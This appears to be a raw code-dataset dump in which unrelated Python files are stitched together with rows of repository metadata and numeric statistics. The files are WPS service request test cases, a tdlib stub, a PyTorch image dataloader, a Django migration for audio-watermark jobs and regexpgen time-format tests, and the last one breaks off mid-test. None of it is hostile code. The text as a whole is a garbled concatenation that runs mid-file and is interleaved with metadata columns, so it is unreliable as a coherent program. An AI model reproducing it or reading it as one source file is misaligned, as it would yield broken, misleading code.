class WPS10ExecuteComplexDataXMLRawOutputTestCase(ContentTypeCheckMixIn, ContentDispositionCheckMixIn, testbase.XMLNoValTestCase):
expectedContentType = "text/xml; charset=utf-8"
expectedContentDisposition = 'attachment; filename="test02_identity_complex.xml"'
def getRequest(self):
params = """<wps:Execute version="1.0.0" service="WPS"
xmlns:wps="http://www.opengis.net/wps/1.0.0"
xmlns:ows="http://www.opengis.net/ows/1.1">
<ows:Identifier>TC02:identity:complex</ows:Identifier>
<wps:DataInputs>
<wps:Input>
<ows:Identifier>TC02:input00</ows:Identifier>
<wps:Data>
<wps:ComplexData mimeType="text/xml">
<test:testXML xmlns:test="http://xml.eox.at/test" />
</wps:ComplexData>
</wps:Data>
</wps:Input>
</wps:DataInputs>
<wps:ResponseForm>
<wps:RawDataOutput mimeType="text/xml">
<ows:Identifier>TC02:output00</ows:Identifier>
</wps:RawDataOutput>
</wps:ResponseForm>
</wps:Execute>
"""
return (params, "xml")
class WPS10ExecuteComplexDataTextRawOutputKVPTestCase(ContentTypeCheckMixIn, ContentDispositionCheckMixIn, testbase.PlainTextTestCase):
expectedContentType = "text/plain; charset=utf-8"
expectedContentDisposition = 'attachment; filename="test02_identity_complex.txt"'
def getRequest(self):
params = "service=WPS&version=1.0.0&request=Execute&identifier=TC02:identity:complex&DataInputs=TC02:input00=P%C5%99%C3%ADli%C5%A1%20%C5%BElu%C5%A5ou%C4%8Dk%C3%BD%20k%C5%AF%C5%88%20%C3%BAp%C4%9Bl%20%C4%8F%C3%A1belsk%C3%A9%20%C3%B3dy.&RawDataOutput=TC02:output00"
return (params, "kvp")
class WPS10ExecuteComplexDataJSONRawOutputKVPTestCase(ContentTypeCheckMixIn, ContentDispositionCheckMixIn, testbase.JSONTestCase):
expectedContentType = "application/json; charset=utf-8"
expectedContentDisposition = 'attachment; filename="test02_identity_complex.json"'
def getRequest(self):
params = "service=WPS&version=1.0.0&request=Execute&identifier=TC02:identity:complex&DataInputs=TC02:input00={%22text%22:%22P%C5%99%C3%ADli%C5%A1%20%C5%BElu%C5%A5ou%C4%8Dk%C3%BD%20k%C5%AF%C5%88%20%C3%BAp%C4%9Bl%20%C4%8F%C3%A1belsk%C3%A9%20%C3%B3dy.%22}@mimeType=application%2Fjson&ResponseDocument=TC02:output00@mimeType=application%2Fjson&RawDataOutput=TC02:output00@mimeType=application%2Fjson"
return (params, "kvp")
class WPS10ExecuteComplexDataXMLRawOutputKVPTestCase(ContentTypeCheckMixIn, ContentDispositionCheckMixIn, testbase.XMLNoValTestCase):
expectedContentType = "text/xml; charset=utf-8"
expectedContentDisposition = 'attachment; filename="test02_identity_complex.xml"'
def getRequest(self):
params = "service=WPS&version=1.0.0&request=Execute&identifier=TC02:identity:complex&DataInputs=TC02:input00=%3Ctest%3AtestXML+xmlns%3Atest%3D%22http%3A%2F%2Fxml.eox.at%2Ftest%22%3EP%C5%99%C3%ADli%C5%A1%20%C5%BElu%C5%A5ou%C4%8Dk%C3%BD%20k%C5%AF%C5%88%20%C3%BAp%C4%9Bl%20%C4%8F%C3%A1belsk%C3%A9%20%C3%B3dy.%3C%2Ftest%3AtestXML%3E@mimeType=text%2Fxml&RawDataOutput=TC02:output00@mimeType=text%2Fxml"
return (params, "kvp")
#===============================================================================
# WCS 1.0 Execute - Complex Data Tests (binary payload)
#===============================================================================
class WPS10ExecuteComplexDataPNGBase64FileTestCase(ContentTypeCheckMixIn, WPS10ExecuteMixIn, testbase.XMLTestCase):
expectedContentType = XML_CONTENT_TYPE
def getRequest(self):
params = """<wps:Execute version="1.0.0" service="WPS"
xmlns:wps="http://www.opengis.net/wps/1.0.0"
xmlns:ows="http://www.opengis.net/ows/1.1">
<ows:Identifier>TC03:image_generator:complex</ows:Identifier>
<wps:DataInputs>
<wps:Input>
<ows:Identifier>TC03:method</ows:Identifier>
<wps:Data>
<wps:LiteralData>file</wps:LiteralData>
</wps:Data>
</wps:Input>
<wps:Input>
<ows:Identifier>TC03:seed</ows:Identifier>
<wps:Data>
<wps:LiteralData>0</wps:LiteralData>
</wps:Data>
</wps:Input>
</wps:DataInputs>
<wps:ResponseForm>
<wps:ResponseDocument lineage="true" storeExecuteResponse="false" status="false">
<wps:Output mimeType="image/png" encoding="base64">
<ows:Identifier>TC03:output00</ows:Identifier>
</wps:Output>
</wps:ResponseDocument>
</wps:ResponseForm>
</wps:Execute>
"""
return (params, "xml")
class WPS10ExecuteComplexDataTIFBase64InMemTestCase(ContentTypeCheckMixIn, WPS10ExecuteMixIn, testbase.WPS10XMLComparison):
expectedContentType = XML_CONTENT_TYPE
def getRequest(self):
params = """<wps:Execute version="1.0.0" service="WPS"
xmlns:wps="http://www.opengis.net/wps/1.0.0"
xmlns:ows="http://www.opengis.net/ows/1.1">
<ows:Identifier>TC03:image_generator:complex</ows:Identifier>
<wps:DataInputs>
<wps:Input>
<ows:Identifier>TC03:method</ows:Identifier>
<wps:Data>
<wps:LiteralData>in-memory-buffer</wps:LiteralData>
</wps:Data>
</wps:Input>
<wps:Input>
<ows:Identifier>TC03:seed</ows:Identifier>
<wps:Data>
<wps:LiteralData>0</wps:LiteralData>
</wps:Data>
</wps:Input>
</wps:DataInputs>
<wps:ResponseForm>
<wps:ResponseDocument lineage="true" storeExecuteResponse="false" status="false">
<wps:Output mimeType="image/tiff" encoding="base64">
<ows:Identifier>TC03:output00</ows:Identifier>
</wps:Output>
</wps:ResponseDocument>
</wps:ResponseForm>
</wps:Execute>
"""
return (params, "xml")
class WPS10ExecuteComplexDataPNGBase64InMemKVPTestCase(ContentTypeCheckMixIn, WPS10ExecuteMixIn, testbase.XMLTestCase):
expectedContentType = XML_CONTENT_TYPE
def getRequest(self):
params = "service=WPS&version=1.0.0&request=Execute&identifier=TC03:image_generator:complex&DataInputs=TC03:method=in-memory-buffer;TC03:seed=0&ResponseDocument=TC03:output00@mimeType=image%2Fpng@encoding=base64&lineage=true"
return (params, "kvp")
class WPS10ExecuteComplexDataJPGBase64KVPTestCase(ContentTypeCheckMixIn, WPS10ExecuteMixIn, testbase.WPS10XMLComparison):
expectedContentType = XML_CONTENT_TYPE
def getRequest(self):
params = "service=WPS&version=1.0.0&request=Execute&identifier=TC03:image_generator:complex&DataInputs=TC03:seed=0&ResponseDocument=TC03:output00@mimeType=image%2Fjpeg@encoding=base64&lineage=true"
return (params, "kvp")
class WPS10ExecuteComplexDataPNGRawOutputKVPTestCase(ContentTypeCheckMixIn, ContentDispositionCheckMixIn, testbase.GDALDatasetTestCase):
expectedContentType = "image/png"
expectedContentDisposition = 'attachment; filename="test03_binary_complex.png"'
def getFileExtension(self, file_type):
return "png"
def getRequest(self):
params = "service=WPS&version=1.0.0&request=Execute&identifier=TC03:image_generator:complex&DataInputs=TC03:seed=0&RawDataOutput=TC03:output00"
return (params, "kvp")
class WPS10ExecuteComplexDataTIFRawOutputKVPTestCase(ContentTypeCheckMixIn, ContentDispositionCheckMixIn, testbase.WPS10BinaryComparison):
expectedContentType = "image/tiff"
expectedContentDisposition = 'attachment; filename="test03_binary_complex.tif"'
def getFileExtension(self, file_type):
return "tif"
def getRequest(self):
params = "service=WPS&version=1.0.0&request=Execute&identifier=TC03:image_generator:complex&DataInputs=TC03:seed=0&RawDataOutput=TC03:output00@mimeType=image%2Ftiff"
return (params, "kvp")
class WPS10ExecuteComplexDataJPGRawOutputTestCase(ContentTypeCheckMixIn, ContentDispositionCheckMixIn, testbase.WPS10BinaryComparison):
expectedContentType = "image/jpeg"
expectedContentDisposition = 'attachment; filename="test03_binary_complex.jpg"'
def getFileExtension(self, file_type):
return "jpg"
def getRequest(self):
params = """<wps:Execute version="1.0.0" service="WPS"
xmlns:wps="http://www.opengis.net/wps/1.0.0"
xmlns:ows="http://www.opengis.net/ows/1.1">
<ows:Identifier>TC03:image_generator:complex</ows:Identifier>
<wps:DataInputs>
<wps:Input>
<ows:Identifier>TC03:seed</ows:Identifier>
<wps:Data>
<wps:LiteralData>0</wps:LiteralData>
</wps:Data>
</wps:Input>
</wps:DataInputs>
<wps:ResponseForm>
<wps:RawDataOutput mimeType="image/jpeg">
<ows:Identifier>TC03:output00</ows:Identifier>
</wps:RawDataOutput>
</wps:ResponseForm>
</wps:Execute>
"""
return (params, "xml")
#===============================================================================
# response parameter input test
#===============================================================================
class WPS10ResponseParameterProcessDescriptionTestCase(ContentTypeCheckMixIn, testbase.XMLTestCase):
expectedContentType = XML_CONTENT_TYPE
def getRequest(self):
params = "service=WPS&version=1.0.0&request=DescribeProcess&identifier=TC07:request-parameter"
return (params, "kvp")
class WPS10ResponseParameterExecuteTestCase(ContentTypeCheckMixIn, WPS10ExecuteMixIn, testbase.XMLTestCase):
expectedContentType = XML_CONTENT_TYPE
def getRequest(self):
params = "service=WPS&version=1.0.0&request=Execute&identifier=TC07:request-parameter&lineage=true"
return (params, "kvp", {"X-Test-Header": "Test-Header-Value"})
| 47.682652
| 421
| 0.640548
| 3,437
| 33,807
| 6.271749
| 0.11318
| 0.057896
| 0.008072
| 0.046947
| 0.76851
| 0.746799
| 0.710614
| 0.701011
| 0.690666
| 0.682362
| 0
| 0.043678
| 0.194102
| 33,807
| 708
| 422
| 47.75
| 0.747513
| 0.109681
| 0
| 0.772569
| 0
| 0.048611
| 0.632147
| 0.298691
| 0
| 0
| 0
| 0.001412
| 0
| 1
| 0.083333
| false
| 0.001736
| 0.003472
| 0.005208
| 0.340278
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
fa2afc139514d9b908c604f00ba6361761f0ae14
| 87
|
py
|
Python
|
py_tdlib/constructors/user_privacy_setting_rule_restrict_contacts.py
|
Mr-TelegramBot/python-tdlib
|
2e2d21a742ebcd439971a32357f2d0abd0ce61eb
|
[
"MIT"
] | 24
|
2018-10-05T13:04:30.000Z
|
2020-05-12T08:45:34.000Z
|
py_tdlib/constructors/user_privacy_setting_rule_restrict_contacts.py
|
MrMahdi313/python-tdlib
|
2e2d21a742ebcd439971a32357f2d0abd0ce61eb
|
[
"MIT"
] | 3
|
2019-06-26T07:20:20.000Z
|
2021-05-24T13:06:56.000Z
|
py_tdlib/constructors/user_privacy_setting_rule_restrict_contacts.py
|
MrMahdi313/python-tdlib
|
2e2d21a742ebcd439971a32357f2d0abd0ce61eb
|
[
"MIT"
] | 5
|
2018-10-05T14:29:28.000Z
|
2020-08-11T15:04:10.000Z
|
from ..factory import Type
class userPrivacySettingRuleRestrictContacts(Type):
pass
| 14.5
| 51
| 0.827586
| 8
| 87
| 9
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114943
| 87
| 5
| 52
| 17.4
| 0.935065
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
d704149824ac4fcbd42f83398eb9ac2df0e279bb
| 29
|
py
|
Python
|
pysal/contrib/geotable/ops/__init__.py
|
cubensys/pysal
|
8d50990f6e6603ba79ae1a887a20a1e3a0734e51
|
[
"MIT",
"BSD-3-Clause"
] | null | null | null |
pysal/contrib/geotable/ops/__init__.py
|
cubensys/pysal
|
8d50990f6e6603ba79ae1a887a20a1e3a0734e51
|
[
"MIT",
"BSD-3-Clause"
] | null | null | null |
pysal/contrib/geotable/ops/__init__.py
|
cubensys/pysal
|
8d50990f6e6603ba79ae1a887a20a1e3a0734e51
|
[
"MIT",
"BSD-3-Clause"
] | 1
|
2021-07-19T01:46:17.000Z
|
2021-07-19T01:46:17.000Z
|
import atomic
import tabular
| 9.666667
| 14
| 0.862069
| 4
| 29
| 6.25
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137931
| 29
| 2
| 15
| 14.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d715a0f3e8d6d6fdb25ba0317b3e52a7c69d8d85
| 4,969
|
py
|
Python
|
utils/dataloader_act.py
|
yanghongji2007/cross_view_localization_EtoTR
|
5b9e89027c69a5071955450ca3e5b10315393120
|
[
"MIT"
] | 16
|
2021-11-19T03:06:52.000Z
|
2022-03-16T13:32:59.000Z
|
utils/dataloader_act.py
|
yanghongji2007/cross_view_localization_EtoTR
|
5b9e89027c69a5071955450ca3e5b10315393120
|
[
"MIT"
] | 3
|
2021-12-07T06:49:13.000Z
|
2022-01-01T07:56:45.000Z
|
utils/dataloader_act.py
|
yanghongji2007/cross_view_localization_L2LTR
|
5b9e89027c69a5071955450ca3e5b10315393120
|
[
"MIT"
] | null | null | null |
import os
from torch.utils.data import DataLoader
from torchvision.transforms import transforms
from PIL import Image
import scipy.io as sio
import torchvision
import argparse
__all__ = ['TrainDataloader','TestDataloader']
class TrainDataloader(DataLoader):
def __init__(self, args):
self.polar = args.polar
self.img_root = args.dataset_dir
self.transform = transforms.Compose(
[transforms.Resize((args.img_size[0], args.img_size[1])),
transforms.ToTensor(),
transforms.Normalize(mean = (0.485, 0.456, 0.406), std = (0.229, 0.224, 0.225))] )
self.transform_1 = transforms.Compose(
[transforms.Resize((256, 256)),
transforms.ToTensor(),
transforms.Normalize(mean = (0.485, 0.456, 0.406), std = (0.229, 0.224, 0.225))] )
self.allDataList = './ACT_data.mat'
__cur_allid = 0 # for training
id_alllist = []
id_idx_alllist = []
# load the mat
anuData = sio.loadmat(self.allDataList)
idx = 0
for i in range(0,len(anuData['panoIds'])):
if self.polar:
grd_id_align = self.img_root + 'streetview/' + anuData['panoIds'][i] + '_grdView.png'
sat_id_ori = self.img_root + 'polarmap/' + anuData['panoIds'][i] + '_satView_polish.png'
else:
grd_id_align = self.img_root + 'streetview/' + anuData['panoIds'][i] + '_grdView.jpg'
sat_id_ori = self.img_root + 'satview_polish/' + anuData['panoIds'][i] + '_satView_polish.jpg'
id_alllist.append([ grd_id_align, sat_id_ori])
id_idx_alllist.append(idx)
idx += 1
all_data_size = len(id_alllist)
print('InputData::__init__: load', self.allDataList, ' data_size =', all_data_size)
training_inds = anuData['trainSet']['trainInd'][0][0] - 1
trainNum = len(training_inds)
print('trainSet:' ,trainNum)
self.trainList = []
self.trainIdList = []
for k in range(trainNum):
self.trainList.append(id_alllist[training_inds[k][0]])
self.trainIdList.append(k)
def __getitem__(self, idx):
x = Image.open(self.trainList[idx][0]).convert('RGB')
x = self.transform(x)
y = Image.open(self.trainList[idx][1]).convert('RGB')
if self.polar:
y = self.transform(y)
else:
y = self.transform_1(y)
return x, y
def __len__(self):
return len(self.trainList)
class TestDataloader(DataLoader):
def __init__(self, args):
self.polar = args.polar
self.img_root = args.dataset_dir
self.transform = transforms.Compose(
[transforms.Resize((args.img_size[0], args.img_size[1])),
transforms.ToTensor(),
transforms.Normalize(mean = (0.485, 0.456, 0.406), std = (0.229, 0.224, 0.225)) ] )
self.transform_1 = transforms.Compose(
[transforms.Resize((256, 256)),
transforms.ToTensor(),
transforms.Normalize(mean = (0.485, 0.456, 0.406), std = (0.229, 0.224, 0.225))] )
self.allDataList = './ACT_data.mat'
__cur_allid = 0 # for training
id_alllist = []
id_idx_alllist = []
# load the mat
anuData = sio.loadmat(self.allDataList)
idx = 0
for i in range(0,len(anuData['panoIds'])):
if self.polar:
# polar transform and crop the ground view
grd_id_align = self.img_root + 'streetview/' + anuData['panoIds'][i] + '_grdView.png'
sat_id_ori = self.img_root + 'polarmap/' + anuData['panoIds'][i] + '_satView_polish.png'
else:
grd_id_align = self.img_root + 'streetview/' + anuData['panoIds'][i] + '_grdView.jpg'
sat_id_ori = self.img_root + 'satview_polish/' + anuData['panoIds'][i] + '_satView_polish.jpg'
id_alllist.append([ grd_id_align, sat_id_ori])
id_idx_alllist.append(idx)
idx += 1
all_data_size = len(id_alllist)
print('InputData::__init__: load', self.allDataList, ' data_size =', all_data_size)
self.val_inds = anuData['valSet']['valInd'][0][0] - 1
self.valNum = len(self.val_inds)
print('valSet:' ,self.valNum)
self.valList = []
for k in range(self.valNum):
self.valList.append(id_alllist[self.val_inds[k][0]])
self.__cur_test_id = 0
def __getitem__(self, idx):
x = Image.open(self.valList[idx][0]).convert('RGB')
x = self.transform(x)
y = Image.open(self.valList[idx][1]).convert('RGB')
if self.polar:
y = self.transform(y)
else:
y = self.transform_1(y)
return x, y
def __len__(self):
return len(self.valList)
| 31.649682
| 110
| 0.570135
| 607
| 4,969
| 4.439868
| 0.172982
| 0.025974
| 0.040816
| 0.04898
| 0.767347
| 0.755473
| 0.755473
| 0.755473
| 0.732468
| 0.732468
| 0
| 0.039121
| 0.29523
| 4,969
| 156
| 111
| 31.852564
| 0.73044
| 0.018515
| 0
| 0.704762
| 0
| 0
| 0.097145
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057143
| false
| 0
| 0.066667
| 0.019048
| 0.180952
| 0.038095
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d7565b64deda72875dd6f9788b3804d9731b9b22
| 2,453
|
py
|
Python
|
web_services/migrations/0001_initial.py
|
berv-uni-project/audio-watermarik-web-services
|
0eb445b4fbd35ee564b910f90419c67cc8380604
|
[
"MIT"
] | 1
|
2021-12-13T01:32:02.000Z
|
2021-12-13T01:32:02.000Z
|
web_services/migrations/0001_initial.py
|
berv-uni-project/audio-watermarik-web-services
|
0eb445b4fbd35ee564b910f90419c67cc8380604
|
[
"MIT"
] | 4
|
2021-12-13T23:14:27.000Z
|
2022-01-11T11:40:04.000Z
|
web_services/migrations/0001_initial.py
|
berv-uni-project/audio-watermark-web-services
|
997fac664e1838210eaad64fe8951bb458fdfb63
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.0.4 on 2018-04-15 09:17
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Embed',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('status', models.CharField(choices=[('pending', 'pending'), ('started', 'started'), ('finished', 'finished'), ('failed', 'failed')], default='pending', max_length=20)),
('method_option', models.CharField(choices=[('embed_1', 'DWT Based and Arnold Transform to Image')], default='0', max_length=100)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('image_input', models.TextField(default='')),
('audio_input', models.TextField(default='')),
('key', models.TextField(default='')),
('accessToken', models.TextField(default='')),
('audio_output', models.TextField(null=True)),
('result', models.TextField(null=True)),
],
),
migrations.CreateModel(
name='Extract',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('status', models.CharField(choices=[('pending', 'pending'), ('started', 'started'), ('finished', 'finished'), ('failed', 'failed')], default='pending', max_length=20)),
('method_option', models.CharField(choices=[('extract_1', 'DWT Based and Arnold Transform to Image')], default='0', max_length=100)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('watermarked_audio_input', models.TextField(default='')),
('original_audio_input', models.TextField(default='')),
('size', models.TextField(default='')),
('key', models.TextField(default='')),
('accessToken', models.TextField(default='')),
('image_output', models.TextField(null=True)),
('result', models.TextField(null=True)),
],
),
]
| 51.104167
| 186
| 0.558092
| 230
| 2,453
| 5.813043
| 0.321739
| 0.145849
| 0.148093
| 0.074794
| 0.795812
| 0.740464
| 0.740464
| 0.740464
| 0.740464
| 0.740464
| 0
| 0.016256
| 0.272727
| 2,453
| 47
| 187
| 52.191489
| 0.733184
| 0.018345
| 0
| 0.55
| 1
| 0
| 0.192031
| 0.00975
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.025
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d7691a30d20f63e3457086938b1969e9e8abb23d
| 39
|
py
|
Python
|
double3/double3sdk/dock_tracker/__init__.py
|
CLOMING/winter2021_double
|
9b920baaeb3736a785a6505310b972c49b5b21e9
|
[
"Apache-2.0"
] | null | null | null |
double3/double3sdk/dock_tracker/__init__.py
|
CLOMING/winter2021_double
|
9b920baaeb3736a785a6505310b972c49b5b21e9
|
[
"Apache-2.0"
] | null | null | null |
double3/double3sdk/dock_tracker/__init__.py
|
CLOMING/winter2021_double
|
9b920baaeb3736a785a6505310b972c49b5b21e9
|
[
"Apache-2.0"
] | null | null | null |
from .dock_tracker import _DockTracker
| 19.5
| 38
| 0.871795
| 5
| 39
| 6.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 39
| 1
| 39
| 39
| 0.914286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d773f38087d3fec6466c3d419a69a594e4dad41c
| 9,929
|
py
|
Python
|
tests/Time.py
|
perfidia/regexpgen
|
a7139219b69127c488efffb588e7ef4177a8ec89
|
[
"MIT"
] | 2
|
2017-02-02T06:04:28.000Z
|
2019-04-23T07:14:58.000Z
|
tests/Time.py
|
perfidia/regexpgen
|
a7139219b69127c488efffb588e7ef4177a8ec89
|
[
"MIT"
] | null | null | null |
tests/Time.py
|
perfidia/regexpgen
|
a7139219b69127c488efffb588e7ef4177a8ec89
|
[
"MIT"
] | null | null | null |
'''
Created on Mar 16, 2012
@authors: Joanna Binczewska, Dawid Kowalski
'''
import unittest
import regexpgen
import re
import itertools
class Test(unittest.TestCase):
def testDefault(self):
regexp = regexpgen.time("%H")
self.assertTrue(re.match(regexp, "01"))
self.assertTrue(re.match(regexp, "10"))
self.assertTrue(re.match(regexp, "00"))
self.assertTrue(re.match(regexp, "23"))
self.assertTrue(re.match(regexp, "17"))
self.assertFalse(re.match(regexp, "1"))
self.assertFalse(re.match(regexp, "33"))
self.assertFalse(re.match(regexp, "24"))
self.assertFalse(re.match(regexp, "99"))
self.assertFalse(re.match(regexp, "-17"))
for format in ["%M", "%S"]:
regexp = regexpgen.time(format)
self.assertTrue(re.match(regexp, "01"))
self.assertTrue(re.match(regexp, "46"))
self.assertTrue(re.match(regexp, "00"))
self.assertTrue(re.match(regexp, "23"))
self.assertTrue(re.match(regexp, "59"))
self.assertFalse(re.match(regexp, "1"))
self.assertFalse(re.match(regexp, "333"))
self.assertFalse(re.match(regexp, "99"))
self.assertFalse(re.match(regexp, "-17"))
regexp = regexpgen.time("%H:%M")
self.assertTrue(re.match(regexp, "01:00"))
self.assertTrue(re.match(regexp, "00:00"))
self.assertTrue(re.match(regexp, "00:05"))
self.assertTrue(re.match(regexp, "23:59"))
self.assertTrue(re.match(regexp, "17:34"))
self.assertFalse(re.match(regexp, "1:12"))
self.assertFalse(re.match(regexp, "33:12"))
self.assertFalse(re.match(regexp, "23:67"))
self.assertFalse(re.match(regexp, "99:00"))
self.assertFalse(re.match(regexp, "-17:11"))
regexp = regexpgen.time("%I:%M %p")
self.assertTrue(re.match(regexp, "01:00 am"))
self.assertTrue(re.match(regexp, "01:00 pm"))
self.assertTrue(re.match(regexp, "09:45 pm"))
self.assertTrue(re.match(regexp, "11:59 pm"))
self.assertTrue(re.match(regexp, "00:00 am"))
self.assertFalse(re.match(regexp, "1:00 am"))
self.assertFalse(re.match(regexp, "01:0 am"))
self.assertFalse(re.match(regexp, "12:00 am"))
regexp = regexpgen.time("%I:%M:%S %p")
self.assertTrue(re.match(regexp, "01:00:00 am"))
self.assertTrue(re.match(regexp, "01:00:20 pm"))
self.assertTrue(re.match(regexp, "09:45:59 pm"))
self.assertTrue(re.match(regexp, "11:59:59 pm"))
self.assertTrue(re.match(regexp, "00:00:00 am"))
self.assertFalse(re.match(regexp, "1:00:00 am"))
self.assertFalse(re.match(regexp, "01:0:00 am"))
self.assertFalse(re.match(regexp, "12:00:00 am"))
def testForWrongFormat(self):
self.assertRaises(ValueError, regexpgen.time, "%wwI:%M %P")
self.assertRaises(ValueError,regexpgen.time, "%I:%I")
self.assertRaises(ValueError,regexpgen.time, "%I:%M")
self.assertRaises(ValueError,regexpgen.time, "%I:%H")
self.assertRaises(ValueError,regexpgen.time, "%H:%S")
self.assertRaises(ValueError,regexpgen.time, "%P")
def testForWrongInput(self):
self.assertRaises(ValueError,regexpgen.time, "%H:%M", "01:00", "00:00")
self.assertRaises(ValueError,regexpgen.time, "%I:%M %P", "01:00 am", "00:00 am")
self.assertRaises(ValueError,regexpgen.time, "%H:%M", "01:00 pm", "00:00 am")
self.assertRaises(ValueError,regexpgen.time, "%H:", "01", "00")
self.assertRaises(ValueError,regexpgen.time, "%H:%M", "01:02", "01:00")
self.assertRaises(ValueError,regexpgen.time, "%H:%M:%S", "01:00:02", "01:00:00")
def testForMin(self):
regexp = regexpgen.time("%H", "10", None)
self.assertTrue(re.match(regexp, "10"))
self.assertTrue(re.match(regexp, "17"))
self.assertTrue(re.match(regexp, "23"))
self.assertFalse(re.match(regexp, "00"))
self.assertFalse(re.match(regexp, "01"))
self.assertFalse(re.match(regexp, "08"))
regexp = regexpgen.time("%S", "40", None)
self.assertTrue(re.match(regexp, "56"))
self.assertTrue(re.match(regexp, "40"))
self.assertTrue(re.match(regexp, "59"))
self.assertFalse(re.match(regexp, "39"))
self.assertFalse(re.match(regexp, "01"))
self.assertFalse(re.match(regexp, "08"))
regexp = regexpgen.time("%H:%M", "12:13", None)
self.assertTrue(re.match(regexp, "12:56"))
self.assertTrue(re.match(regexp, "13:40"))
self.assertTrue(re.match(regexp, "23:59"))
self.assertFalse(re.match(regexp, "00:39"))
self.assertFalse(re.match(regexp, "12:01"))
self.assertFalse(re.match(regexp, "12:12"))
regexp = regexpgen.time("%I:%M %P", "12:13 PM", None)
self.assertTrue(re.match(regexp, "12:56 PM"))
self.assertTrue(re.match(regexp, "12:13 PM"))
self.assertTrue(re.match(regexp, "04:59 PM"))
self.assertFalse(re.match(regexp, "00:39 AM"))
self.assertFalse(re.match(regexp, "12:01 PM"))
self.assertFalse(re.match(regexp, "12:12 PM"))
def testForMax(self):
regexp = regexpgen.time("%H", None, "10")
self.assertFalse(re.match(regexp, "11"))
self.assertFalse(re.match(regexp, "17"))
self.assertFalse(re.match(regexp, "23"))
self.assertTrue(re.match(regexp, "00"))
self.assertTrue(re.match(regexp, "01"))
self.assertTrue(re.match(regexp, "08"))
regexp = regexpgen.time("%S", None, "40")
self.assertFalse(re.match(regexp, "56"))
self.assertFalse(re.match(regexp, "41"))
self.assertFalse(re.match(regexp, "59"))
self.assertTrue(re.match(regexp, "39"))
self.assertTrue(re.match(regexp, "01"))
self.assertTrue(re.match(regexp, "08"))
regexp = regexpgen.time("%H:%M", None, "12:13")
self.assertFalse(re.match(regexp, "12:56"))
self.assertFalse(re.match(regexp, "13:40"))
self.assertFalse(re.match(regexp, "23:59"))
self.assertTrue(re.match(regexp, "00:39"))
self.assertTrue(re.match(regexp, "12:01"))
self.assertTrue(re.match(regexp, "12:12"))
regexp = regexpgen.time("%I:%M %P", None, "12:13 PM")
self.assertFalse(re.match(regexp, "12:56 PM"))
self.assertFalse(re.match(regexp, "01:40 PM"))
self.assertFalse(re.match(regexp, "10:59 PM"))
self.assertTrue(re.match(regexp, "00:39 AM"))
self.assertTrue(re.match(regexp, "12:01 PM"))
self.assertTrue(re.match(regexp, "12:12 PM"))
def testForMinMax(self):
regexp = regexpgen.time("%H", "03", "10")
self.assertFalse(re.match(regexp, "11"))
self.assertFalse(re.match(regexp, "17"))
self.assertFalse(re.match(regexp, "02"))
self.assertTrue(re.match(regexp, "03"))
self.assertTrue(re.match(regexp, "05"))
self.assertTrue(re.match(regexp, "10"))
self.assertTrue(re.match(regexp, "08"))
regexp = regexpgen.time("%S", "20", "40")
self.assertFalse(re.match(regexp, "19"))
self.assertFalse(re.match(regexp, "59"))
self.assertFalse(re.match(regexp, "45"))
self.assertTrue(re.match(regexp, "39"))
self.assertTrue(re.match(regexp, "20"))
